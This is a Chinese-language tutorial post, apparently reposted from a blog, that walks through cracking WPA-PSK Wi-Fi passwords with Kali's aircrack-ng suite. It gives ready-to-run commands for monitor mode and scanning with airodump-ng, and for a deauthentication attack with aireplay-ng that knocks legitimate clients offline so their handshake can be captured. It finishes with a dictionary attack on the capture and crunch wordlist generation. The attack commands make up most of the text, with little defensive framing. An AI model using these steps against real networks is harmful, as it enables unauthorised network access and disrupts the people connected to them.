1. 程式人生 > >Kali之aircrack-ng

Kali之aircrack-ng

個數 IT -c 驗證 地址 rod cap RM 難度

技術分享圖片

WPA-PSK的破解基於WPA-PSK握手驗證報文數據的獲取與識別,攻擊者只要獲取到盡可能的握手驗證報文數據包就有機會破解。

安裝 aircrack-ng 套件
註:Kali linux 是自帶組件的。

sudo apt-get install aircrak-ng

1) iwconfig #或airmon-ng,查看無線網卡

2)ifconfig wlan0 up #激活無線網卡。

3)airmon-ng start wlan0(無線網卡) #將無線網卡設置為監聽模式。

4)airodump-ng wlan0 #查看附近的wifi。airodump-ng <你的monitor名稱>

技術分享圖片

  • BSSID是AP端的MAC地址
  • PWR是信號強度,數字越小越好
  • #Data是對應的路由器的在線數據吞吐量,數字越大,數據上傳量越大。
  • CH是對應路由器的所在頻道
  • ESSID是對應路由器的名稱

監聽wifi

5)airodump-ng -w 路徑/文件名 -c 頻道 --bssid mac地址 wlan0(處於監聽模式下的無線網卡) #對特定頻道下的無線網絡進行監聽,掃描數據保存到特定文件。
即sudo airodump-ng -c 6 -w /root/handshake --bssid C0:00:00:00:00:48 wlan0mon

握手包文件的拓展名為 .cap 如紅色方框所示。

然後,你的網卡會開始監聽你目標端的頻道,註意圖片的右上角

技術分享圖片

保持此terminal窗口的運行狀態

使用aireplay-ng進行解除認證攻擊模式

握手包的概念,握手包指的是采用WPA加密方式的無線AP與無線客戶端進行連接前的認證信息包。

一個合法的客戶端要連上AP要經歷四次握手(ex.2)
1.你請求連AP 2.AP發一個數據包給你
3.你將收到的數據包用wpa密鑰加密,然後發給AP
4.AP用自己保存的wpa密鑰加密相同數據包,然後和你發給他的比較,如果相同,就發準許接入的許可。
上面就是一個合法客戶端四次握手的全過程,我們所說的抓握手包,是指抓AP發給合法客戶的數據包,和合法客戶端加密後發給AP的數據包。所以我們就抓這兩個包,當我們有了明文和密文,就可以破解出密鑰。

所以我們這裏的關鍵是要發動攻擊,迫使合法的客戶端斷線,進行重新認證,我們趁機抓包。

6)aireplay-ng -0 0 -a AP的mac地址 -c 客戶端的mac地址 mon0(處於監聽模式下的無線網卡) #-0代表deauth重傳攻擊方式,使客戶端斷開重連以便有機會得到握手驗證數據報文

sudo aireplay-ng -0 0 -a 04:D1:3A:63:D9:02 -c 70:E2:01:61:87:84 wlan0mon

技術分享圖片

7)關閉監聽模式。

sudo airmon-ng stop wlan0mon

8)aircrack-ng -w 字典 捕獲的cap文件 #使用預先準備好的字典破解密碼,註意,WPA/WPA2加密的wifi密碼是一種相對安全的密碼保護機制,破解起來可能有一定的難度。

sudo aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap
註:`aircrack-ng -w <字典路徑> <握手包路徑>

制作字典

安裝crunch sudo apt-get install crunch

使用語法 crunch <min> max<max> <characterset> -t <pattern> -o <output filename>

<min> = 最小密碼長度。
<max> = 最大密碼長度。
<characterset> = 用於生成密碼的字符集。
<pattern> = 生成的密碼的指定模式。
<outputfile> = 保存字典文件的路徑。

註: pattern中可以使用的特殊標記字符(ex.3)
[%]插入數字
[@] 插入小寫字母
[,] 插入大寫字母
[^] 插入符號

crunch 5 5 -t 1@,^9 -o /root/pwdlist.txt #生成第一位為1,第二位為小寫字母,第三位為答謝字母,第四位為符號,最後一位為9的五位數密碼

crunch 1 6 0123456789 -o /root/pwdlist.txt #生成1-6位純數字(指定的0-9)的密碼

Kali之aircrack-ng